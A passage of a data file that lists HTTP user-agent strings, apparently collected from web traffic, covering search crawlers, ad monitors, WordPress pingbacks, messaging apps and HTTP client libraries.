10_15_7) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 +Java/11.0.9 +Java/11.0.10 +WhatsApp/2.21.5.15 A +WhatsApp/2.21.50.15 i +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615847081-0 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.94 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 (en-us) AppleWebKit/537.36(KHTML, like Gecko; Google-Adwords-DisplayAds-WebRender;) Chrome/89.0.4389.84Safari/537.36 +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview Analytics) Chrome/89.0.4389.84 Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview Analytics) Chrome/89.0.4389.84 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/537.36 (KHTML, like Gecko; Mediapartners-Google) Chrome/89.0.4389.93 Mobile Safari/537.36 +Mozilla/5.0 (en-us) AppleWebKit/537.36(KHTML, like Gecko; Google-Adwords-DisplayAds-WebRender;) Chrome/89.0.4389.93Safari/537.36 +WordPress/5.7; https://news31.cloudaccess.host +WordPress/5.7; https://securedbrain.com +Apache-HttpClient/4.5.12 (Java/1.8.0_181) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1615855374-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1615867523-0 +WordPress/5.7; https://devwpbridge.wpengine.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615912836-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615870236-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615913852-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615923289-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615930915-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615857951-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1615858601-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615862759-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615862756-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1615870906-0 +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/89.0.4389.93 Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615882371-0 +WhatsApp/2.21.6.6 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615903518-0 +WhatsApp/2.2108.9 N +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615903515-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615903514-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615915839-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615917070-0 +WhatsApp/2.21.5.17 A +WhatsApp/2.21.4.18 A +WordPress/5.6.2; https://okidk.de +FDM/6.13.2.3510 +WordPress/5.6.2; https://news32.cloudaccess.host +WordPress/3.7.5; http://toedenova.unblog.fr +Googlebot/2.1 (Atari; N; GNU/Mach 2.2.0; CDC1604; rv1.4.2) Dragon/20040411 Thunderfish/6.0.1 +Mozilla/5.0 (compatible; Google-Apps-Script; beanserver; +https://script.google.com; id: UAEmdDd9zBo1e7wBk2Bsf2JbcbuLcW2fJkpw) +curl/7.16.4 (i486-pc-linux-gnu) libcurl/7.16.4 OpenSSL/0.9.8e zlib/1.2.3.3 libidn/1.0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615932651-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1615946494-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1615955475-0 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.95 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com) +Mozilla/5.0 (compatible; Adsbot/3.1; +https://seostar.co/robot/) +WordPress/5.7; https://katherineheiglcollection.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615988364-10 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 AppEngine-Google; (+http://code.google.com/appengine; appid: s~surf702-hrd) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1615949027-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615954008-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1615959150-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615966982-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615966990-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615973120-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1615985822-0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 PTST/210317.003242 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Mobile Safari/537.36 PTST/210317.003242 +Mozilla/5.0 (compatible; YaDirectFetcher/1.0; +http://yandex.com/bots) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.268 +WordPress/5.7; https://da.digitaldepo.cz +WordPress/5.7; https://www.maccanismi.it +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1616031350-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1616045742-0 +WhatsApp/2.21.6.11 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1616100569-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1616100582-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1616103553-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1616030047-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1616033384-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1616038889-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1616070244-0 +WhatsApp/2.21.6.10 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1616102200-0 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.97 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +okhttp/3.14.3 +Screaming Frog SEO Spider/14.3 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36 AppEngine-Google; (+http://code.google.com/appengine; appid: s~xxnet-scrisqiu-5) +Snapchat/11.7.0.62_(moto g(2) play: Android 9#97f98#28; gzip) V/MUSHROOM +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) adbeat.com/policy AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15 +Googlebot/2.1 (+http://google.com/bot.html) +WordPress/5.7; https://ittone.ma/ittone +WordPress/5.7; https://angularquestions.com +WordPress/5.7; https://askjavascriptquestions.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1616116891-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1616116893-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1616117439-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1616128158-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1616174064-0 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.99 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1616194894-0 +Mozilla/5.0 (X11; Datanyze; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36 +Apache-HttpClient/4.5.13 (Java/1.8.0_222 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1616200584-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1616210535-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1616206030-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1616202736-0 +Test/Nutch-1.19-SNAPSHOT +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1616213949-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1616251797-0 +WhatsApp/2.21.6.12 A +Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_1) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36 +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview Analytics) Chrome/89.0.4389.93 Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) facebot/1.6.5 Chrome/69.0.3497.128 Electron/4.1.1 Safari/537.36 +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; GoogleAdwordsExpress) Chrome/89.0.4389.93 Safari/537.36 +Mozilla/5.0 (compatible; heritrix/3.4.0-20200518 +https://josephtparsons.com) +WordPress/5.7; https://www.blaidalmau.net +RadiosNet/2.1.1 (Java; Android) +Apache-HttpClient/4.5.10 (Java/1.8.0_282) +yacybot (/global; amd64 Linux 5.11.7-gentoo-r1; java 11.0.10; Europe/de) http://yacy.net/bot.html +Mozilla/5.0 (compatible; Yahoo Link Preview; https://help.yahoo.com/kb/mail/yahoo-link-preview-SLN23615.html) maild/1616369948-0 +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; QQDownload 1.7; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1616356282-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1616291905-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1616304629-0 +yacybot (/global; amd64 Linux 5.10.0-4-amd64; java 17-ea; Europe/es) http://yacy.net/bot.html +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1616364649-0 +WordPress/5.7; https://wdroidx.com +Python/3.9 aiohttp/3.7.4 +Mozilla/5.0 (compatible; Google-Apps-Script; beanserver; +https://script.google.com; id: UAEmdDd8ucf2OjcM7r8aADhDpIQ9xbrGmWQY +UnityPlayer/2019.2.21f1 (UnityWebRequest/1.0, libcurl/7.52.0-DEV) +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.102 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Python/3.8 aiohttp/3.7.4.post0 +WordPress/5.7; https://rusrokers.ru +WordPress/5.3.6; https://microclimate.su +okhttp/5.0.0-alpha.2 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1616460229-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1616474275-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1616475824-0 +Mozilla/4.0 (Windows 10 10.0) Java/1.8.0_121 +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/89.0.4389.99 Safari/537.36 +WhatsApp/2.21.7.1 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1616464737-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1616519358-10 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.107 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Safari/537.36 OPR/74.0.3911.232 AppEngine-Google; (+http://code.google.com/appengine; appid: s~surf702-hrd) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1616465267-0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 PTST/210322.203727 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1616479543-0 +WordPress/5.5.3; http://lisansustu.omu.edu.tr +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1616513241-0 +Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/537.36 (KHTML, like Gecko; Mediapartners-Google) Chrome/89.0.4389.99 Mobile Safari/537.36 +WordPress/5.7; https://1agenstvo.ru +googlebot/2.1(+http://googlebot.com/bot.html) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1616546497-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1616562243-0 +WordPress/5.7; https://digital3c.live +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1616620950-0 +python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.21.1.el7.x86_64 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1616605831-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1616605833-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1616623630-10 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.108 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +WhatsApp/2.21.5.14 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1616548902-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1616548854-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1616563761-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1616564657-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1616566142-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1616568350-0 +WhatsApp/2.21.7.2 A +WhatsApp/2.21.6.14 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1616619862-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1616622651-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1616626196-0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 PTST/210323.194324 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.107 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html),gzip(gfe) +GoogleTranslate/5.28.0.RC05.242803286 (Linux; U; Android 4.4.4; G4E) +WhatsApp/2.21.7.3 A +curl 'http://localhost:4000/' \ -H 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36' +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1616636167-0 +WordPress.com; https://kkit365.wordpress.com +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.109 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1616638307-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1616648717-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1616660484-0 +WhatsApp/2.21.7.4 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1616696341-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1616712583-0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 PTST/210324.184838 +NetSurf/1.2 (Linux; x86_64) +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) sieve-gq1/1616665463-60 +WordPress/5.6; https://win-torrent.ru +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.99 Safari/537.36 (compatible; Google-Shopping-Quality http://www.google.com/merchants/tos/extend/DE/tos.html) +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36 +WordPress/5.6.2; https://boulderphil.org; verifying pingback from 176.116.230.64 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1616788132-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1616788126-10 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.110 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +lua-resty-http/0.07 (Lua) ngx_lua/10012 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1616769614-0 +WhatsApp/2.21.7.5 A +Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) 